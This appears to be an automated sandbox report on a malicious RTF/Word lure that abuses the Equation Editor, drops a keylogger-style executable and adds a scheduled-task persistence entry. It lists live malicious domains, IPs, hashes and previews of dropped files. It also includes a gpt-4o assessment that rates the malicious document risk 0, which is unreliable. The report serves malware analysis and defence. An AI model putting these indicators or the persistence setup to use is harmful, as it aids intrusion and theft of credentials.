                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                          • Execution Graph export aborted for target EQNEDT32.EXE, PID 3408 because there are no executed function
                          • Execution Graph export aborted for target gRpkBp.exe, PID 2060 because it is empty
                          • Execution Graph export aborted for target swagodi78811.scr, PID 3880 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: order072724.docx.doc
| Time | Type | Description |
|---|---|---|
| 14:45:25 | Task Scheduler | Run new task: gRpkBp path: C:\Users\user\AppData\Roaming\gRpkBp.exe |
| 17:45:18 | API Interceptor | 60x Sleep call for process: EQNEDT32.EXE modified |
| 17:45:20 | API Interceptor | 1600941x Sleep call for process: swagodi78811.scr modified |
| 17:45:22 | API Interceptor | 105x Sleep call for process: powershell.exe modified |
| 17:45:24 | API Interceptor | 3x Sleep call for process: schtasks.exe modified |
| 17:45:25 | API Interceptor | 194x Sleep call for process: taskeng.exe modified |
| 17:45:27 | API Interceptor | 984822x Sleep call for process: gRpkBp.exe modified |
                          Input: URL: Office document; Model: gpt-4o
                          Output:
                          ```json
                          {
                            "riskscore": 0,
                            "reasons": "The provided screenshot does not contain any visually prominent buttons or links. The text in the screenshot appears to be a list of items or codes, and there is no language that creates a sense of urgency or interest. Additionally, there is no impersonation of well-known brands. Therefore, there is no indication that this document could mislead the user into clicking on a potentially harmful link."
                          }
                          ```
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 172.67.197.72 | LisectAVT_2403002B_80.exe | malicious | Lokibot | meridianresourcellc.top/document/five/fre.php |
| 132.226.8.169 | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| 132.226.8.169 | SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe | malicious | Snake Keylogger | checkip.dyndns.org/ |
| 132.226.8.169 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger | checkip.dyndns.org/ |
| 132.226.8.169 | kHeNppYRgN.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| 132.226.8.169 | Purchase Order - P04737.xls | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| 132.226.8.169 | 5RQ24SOW EPIRB_TOTAL Marine Services Ltd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| 132.226.8.169 | DHL_497104908518.exe | malicious | Snake Keylogger | checkip.dyndns.org/ |
| 132.226.8.169 | Tystnendes.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/ |
| 132.226.8.169 | 25bbed456281ea6f37cb6b295ebd0d1764156e797b4f15e0dc1bbcd7342086a9_payload.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| 132.226.8.169 | Revised PI_2024.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/ |
| 149.154.167.220 | VJV2AjJ7Na.exe | malicious | XWorm | |
| 149.154.167.220 | zx.ps1 | malicious | Unknown | |
| 149.154.167.220 | new order 00041221.exe | malicious | Snake Keylogger, VIP Keylogger | |
| 149.154.167.220 | 7NeoZ6OBn2.exe | malicious | Unknown | |
| 149.154.167.220 | 7NeoZ6OBn2.exe | malicious | Unknown | |
| 149.154.167.220 | file.exe | malicious | Unknown | |
| 149.154.167.220 | file.exe | malicious | Unknown | |
| 149.154.167.220 | file.exe | malicious | Unknown | |
| 149.154.167.220 | LisectAVT_2403002A_127.exe | malicious | AgentTesla | |
| 149.154.167.220 | LisectAVT_2403002A_74.exe | malicious | AgentTesla | |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| reallyfreegeoip.org | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | malicious | Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | new order 00041221.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | New order.exe | malicious | Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | New Order.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | Payment_Advice.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | LPO-9180155-PDF.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | Apixaban - August 2024.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | Payment Slip.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | Torpernes.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | Confirmation Order.js | malicious | Snake Keylogger | 188.114.97.3 |
| meridianresourcellc.top | LisectAVT_2403002B_18.exe | malicious | Lokibot | 104.21.52.88 |
| meridianresourcellc.top | LisectAVT_2403002B_80.exe | malicious | Lokibot | 172.67.197.72 |
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.27057.11598.rtfGet hashmaliciousRemcosBrowse
                                              • 104.21.52.88
                                              th#U00f4ng s#U1ed1 k#U1ef9 thu#U1eadt.scr.exeGet hashmaliciousLokibotBrowse
                                              • 104.21.52.88
                                              checkip.dyndns.comSecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              New order.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.6.168
                                              New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.130.0
                                              Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 158.101.44.242
                                              Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              api.telegram.orgVJV2AjJ7Na.exeGet hashmaliciousXWormBrowse
                                              • 149.154.167.220
                                              zx.ps1Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.025564139045165832
                                              Encrypted:false
                                              SSDEEP:6:I3DPcjEHvxggLRxDsCY/l3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPLFIRvYg3J/
                                              MD5:1DC466685469840300A494CD367B51A9
                                              SHA1:06DA5DCF5D3C315B65A92225E651BD052D8B365A
                                              SHA-256:4F940B9345C1494059A19CACDAC806388BA1AB1D5A994ECE8D186EF7DF18BF51
                                              SHA-512:9BF965C1C403BC6BC384549A695633C70F576976608E7D808A50F64380A5C1A13E72AE9646E21A6979667737182D97577BD33218CF71F24D2F5C35DA5FB397C3
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:@...e...........................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Rich Text Format data, version 1
                                              Category:dropped
                                              Size (bytes):711568
                                              Entropy (8bit):4.106515155471183
                                              Encrypted:false
                                              SSDEEP:6144:j62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62I:K
                                              MD5:05E14A71757A27A508D0324732E006FE
                                              SHA1:54555F143881B2E53E44BC430BF709FC785F6BCF
                                              SHA-256:EEC7CF36EE9F2BB08B710C19227840D9FCB632C3DCCDF756D5A46CE194290469
                                              SHA-512:411E301FD70CCD8C16E2B85B37442387F9F3721A7BB24F236695DA95714C814A207F0D4AAA29B67ED594E8AAAEB13562922373AF7FC58622F33924371116878D
                                              Malicious:false
                                              Yara Hits:
                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].doc, Author: ditekSHen
                                              Preview:{\rtf1..{\*\uow9Bqc8PtXTP3i85Dr4RyUlnpM5Ni1L3cpeJawSatrQkWySqpR5AZOyS0IoURaNmtYpd0VKML7q}..{\825440998please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly ...stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter ...In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to ...the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material ...misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good ...internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) ...employees in the normal course of performing their duties. If the auditors detect an unexpected material mi
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):683016
                                              Entropy (8bit):7.9744561964387195
                                              Encrypted:false
                                              SSDEEP:12288:HsTnHaxBnGvHnutIognoP+wRYnS0qYVd1XXikKRj9l/klFck1zJstnkR:WaznWHfYFYnK8PXikKRnCc2dN
                                              MD5:C448536AEEA36B80A15D639E31C7B847
                                              SHA1:5225387E8D149E14A73F3D25A055B069750AEFCC
                                              SHA-256:490784A930FE7D630C926436C540441694C905A9CB1FE6B3C25D16C366D75492
                                              SHA-512:E51B95996A95C7FC9AE4206A76642D8C4B59062BB49BC54931BDC1FDA8A080F5F29451E71A3F63F2C3530D8D71B56F9E00482D38A6C645492932986523576F01
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Rich Text Format data, version 1
                                              Category:dropped
                                              Size (bytes):711568
                                              Entropy (8bit):4.106515155471183
                                              Encrypted:false
                                              SSDEEP:6144:j62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62I:K
                                              MD5:05E14A71757A27A508D0324732E006FE
                                              SHA1:54555F143881B2E53E44BC430BF709FC785F6BCF
                                              SHA-256:EEC7CF36EE9F2BB08B710C19227840D9FCB632C3DCCDF756D5A46CE194290469
                                              SHA-512:411E301FD70CCD8C16E2B85B37442387F9F3721A7BB24F236695DA95714C814A207F0D4AAA29B67ED594E8AAAEB13562922373AF7FC58622F33924371116878D
                                              Malicious:false
                                              Yara Hits:
                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.doc, Author: ditekSHen
                                              Preview:{\rtf1..{\*\uow9Bqc8PtXTP3i85Dr4RyUlnpM5Ni1L3cpeJawSatrQkWySqpR5AZOyS0IoURaNmtYpd0VKML7q}..{\825440998please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly ...stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter ...In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to ...the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material ...misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good ...internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) ...employees in the normal course of performing their duties. If the auditors detect an unexpected material mi
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):5632
                                              Entropy (8bit):3.9477587075262717
                                              Encrypted:false
                                              SSDEEP:48:ru0MPeLdgMm1mPGZ4Qo9gGl7phLCKjGnh9m9/kB1Ye:hMPeLOMwKxQHUL10/myBW
                                              MD5:078789EA65682BBBEB17D2391C5AB0B9
                                              SHA1:268E4A02F102F2858C5C9E95B59E72B9891C972E
                                              SHA-256:9EEEBD03C0C88A6C0F997FE22E09DFCA0FE06B52647B9A88CA3590BE20ECEC55
                                              SHA-512:B0680AA9D84D0217A445721DC98D75A4D8DF94C144121437534CFB91045E3F7B1CF42D002584CCCE9054E7732871A1F0C16B46DE9AD965E3DE3518CCDB69C0BB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):615936
                                              Entropy (8bit):3.4337341964764097
                                              Encrypted:false
                                              SSDEEP:6144:ryemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryeq:l
                                              MD5:10F8EB237CA285E74732B15966D220CA
                                              SHA1:98F706ED47C1D50CA5AE7F898544227C55A9EC0A
                                              SHA-256:FC034C90EF1ABDFCB3C3604942A5DBA9E79829173E28EF8E240DB4738FECBA61
                                              SHA-512:3219BDCD44587E95B6DEF7951A5AF240F0E6A3E7946715321883F79B51720768E65A1E99DA62C62933FE0A9B95ECC83EA910DBEE4F63C3B86368F47C1F31976C
                                              Malicious:false
                                              Preview:2.5.4.4.0.9.9.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3568273340340578
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbM:IiiiiiiiiifdLloZQc8++lsJe1Mzdl/n
                                              MD5:4A4B94C9957F158CDD601AB4F1E16029
                                              SHA1:564EF0627AB54CE6D6BBF73F556F41258AA6235C
                                              SHA-256:D08805B4AE8B78BB7422E13BA07A591B250F4220456DA0FA819049E45A3B3B44
                                              SHA-512:326D98CAA18C011A92EC1CB8458A83B32F13874A2F04B431AD28D36EB55D8AF065618B5B3FB4F2BCE24BC462F8B735F35D7D0F7D6E9A48793BE74981C75C824B
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):511450
                                              Entropy (8bit):3.621629728928142
                                              Encrypted:false
                                              SSDEEP:6144:RemBdeFemQZdeHemBde2em/deXemBdexemBdeMemBdememBdekemBde6emBdeqeS:k
                                              MD5:271957CE1E8C89ECC5B78817AFF72C3B
                                              SHA1:A09354D842AA8EB80F1809A4C0495A182D4299E0
                                              SHA-256:29909FE15CB930A5F538F574A6E37EE8D6B007B32861E2ED53CC8488084ACD93
                                              SHA-512:41DAD904919ACBE45028AC4EF5907AB2D37F0FFEDBB18771B9D11D7CEF320D06A008993B5C27CA816F49DE52A1B362B80AD66D75672155141787BD494F220EB6
                                              Malicious:false
                                              Preview:..d.M.B.C.....B.E.S.O.N.D.E.R.H.E.D.E. .B.E.S.O.N.D.E.R.H.E.D.E. .V.I.R. .H.I.E.R.D.I.E. .M.A.A.N.D.....D.R.A.E.N.D.E. .N.R... .H.O.E.V.....3.0.2.0.8. .N.B.C. .D.R.A.A.G. .3.0. .S.T.K.....3.0.3.0.8. .N.B.C. .D.R.A.A.G. .6. .S.T.K.....3.2.0.0.7.X. .N.B.C. .D.R.A.A.G. .7.4. .S.T.K.....3.3.0.0.5. .N.B.C. .w.a.t. .5. .s.t.e.l.l.e. .d.r.a.....5.2.7.9.9. ./. .8.0.0.U. .(.2.5.8.7.7./.2.1.). .N.B.C. .w.a.t. .3.0. .P.C.S. .d.r.a.....6.0.0.1. .N.B.C. .w.a.t. .1.0.0. .s.t.u.k.s. .d.r.a.....6.0.0.4. .N.B.C. .w.a.t. ...................f...h...................................R...T..................................................................................................................................................................................................................................................................................................<...$..$.If........!v..h.#v..9.:V....l...,..t.......9..6.,.....5.....9.9...../.............B.....a..].p............yt........d........gd.
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.102475688478882
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTuv
                                              MD5:6D99E6CD844D5ADD3B984F1948DA2646
                                              SHA1:15CB9C373AAD15F533F1FCF1FD3EC21D0AB61AB7
                                              SHA-256:6FA1B2B733D08BD0EBCB9822B7FF5CE25DEB7EA6C2B4B1313C6586C66FBFE1B3
                                              SHA-512:239E5F54414E88DA4D0DA2A59FAE09BE18A211BE8A41904440B7D32ED40BC3BB6D0516D6E9C2EBEC2D4853474A313E70F5BB8B7217E6F22B2CF126F7A59D2BFD
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                              Process:C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.102475688478882
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTuv
                                              MD5:6D99E6CD844D5ADD3B984F1948DA2646
                                              SHA1:15CB9C373AAD15F533F1FCF1FD3EC21D0AB61AB7
                                              SHA-256:6FA1B2B733D08BD0EBCB9822B7FF5CE25DEB7EA6C2B4B1313C6586C66FBFE1B3
                                              SHA-512:239E5F54414E88DA4D0DA2A59FAE09BE18A211BE8A41904440B7D32ED40BC3BB6D0516D6E9C2EBEC2D4853474A313E70F5BB8B7217E6F22B2CF126F7A59D2BFD
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.0256201868743868
                                              Encrypted:false
                                              SSDEEP:6:I3DPcpvxggLRNpRuJcZksl3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPSB+c3TvYg3J/
                                              MD5:9BA6521AA4C293C42D4E2FEC0E7ACA22
                                              SHA1:158CD63044F9742D025F1FA28250EA84E7EED080
                                              SHA-256:36DECCAF1198C11A8573A9487781CC47666C8E48CB338168F2D520C5230104B5
                                              SHA-512:A95412771A17E29BE29A10FBECD277BEC8CADCCF2375786C53794EC1F40EDBC2AAF9DC0C4BA49FEBD2A5A77F4A8AA7A5F215C1C0D47DA3F19546EB12C68E12F2
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.025564139045165832
                                              Encrypted:false
                                              SSDEEP:6:I3DPcjEHvxggLRxDsCY/l3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPLFIRvYg3J/
                                              MD5:1DC466685469840300A494CD367B51A9
                                              SHA1:06DA5DCF5D3C315B65A92225E651BD052D8B365A
                                              SHA-256:4F940B9345C1494059A19CACDAC806388BA1AB1D5A994ECE8D186EF7DF18BF51
                                              SHA-512:9BF965C1C403BC6BC384549A695633C70F576976608E7D808A50F64380A5C1A13E72AE9646E21A6979667737182D97577BD33218CF71F24D2F5C35DA5FB397C3
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Generic INItialization configuration [folders]
                                              Category:dropped
                                              Size (bytes):116
                                              Entropy (8bit):4.595989056219899
                                              Encrypted:false
                                              SSDEEP:3:M1V7Jp2NBSm4uBMEHjGvRKVLX2NBSv:MBp2n7f6JOLX2nc
                                              MD5:24FECF80E8AA21D60A3E87434DDBBE1D
                                              SHA1:DE2DF2A8D8E2C5D14B293F1C96266075D5B94B9C
                                              SHA-256:D609E341B62603B5AE94B8B8EBAA4F9A76098B732396DE5F5DD5FC150B167BDD
                                              SHA-512:C8598EFD5F3414E3110FA5D8A62523A97AD0A72AAB574DFBA9298E55E9B8E8290023CDAC94C46A7ACB649A2E660A8DD8E702B7D3C58A4F5320A4AC46BF3960EB
                                              Malicious:false
                                              Preview:[doc]..swagodi.doc.url=0..order072724.docx.LNK=0..[folders]..meridianresourcellc.top.url=0..order072724.docx.LNK=0..
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://meridianresourcellc.top/>), ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):58
                                              Entropy (8bit):4.515044522508076
                                              Encrypted:false
                                              SSDEEP:3:HRAbABGQYm2fYFHjGvRKVKy:HRYFVm4Yh6JOD
                                              MD5:CE919771462756159C19EF008ADBA361
                                              SHA1:B4BF29478B73CF30DD7B82190ECE702B0194F0C5
                                              SHA-256:237781B51E25E5B3F2E561416E4862048EDC8B06E1D4498206D1B1849144D7C1
                                              SHA-512:7677002729140F68B375B2A90948CBBCA3A22D40B2AD1234A953E8A982B669B616E03031DB5D037F8ADC7EB1D55251BC28E82940B02902893F7939F9FDBF73DA
                                              Malicious:true
                                              Preview:[InternetShortcut]..URL=https://meridianresourcellc.top/..
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Fri Jul 26 20:45:00 2024, length=96005, window=hide
                                              Category:dropped
                                              Size (bytes):1044
                                              Entropy (8bit):4.537080470652056
                                              Encrypted:false
                                              SSDEEP:12:8RUUhgXg/XAlCPCHaXEqzBTytB/BGFX+WS/icWIYs3icvbDksPDtZ3YilMMEpxRI:8N/XTH1ytbkOcsyecsPDv3qaik7N
                                              MD5:D9110446B97182D6C8D373A8E6ABE302
                                              SHA1:7A2B11A85C68336819DD0402C6FA9EFDB663BCEF
                                              SHA-256:631C448C354541E5F72196B3835A300F73895C0BAA5B3915C3C873BB45CD5973
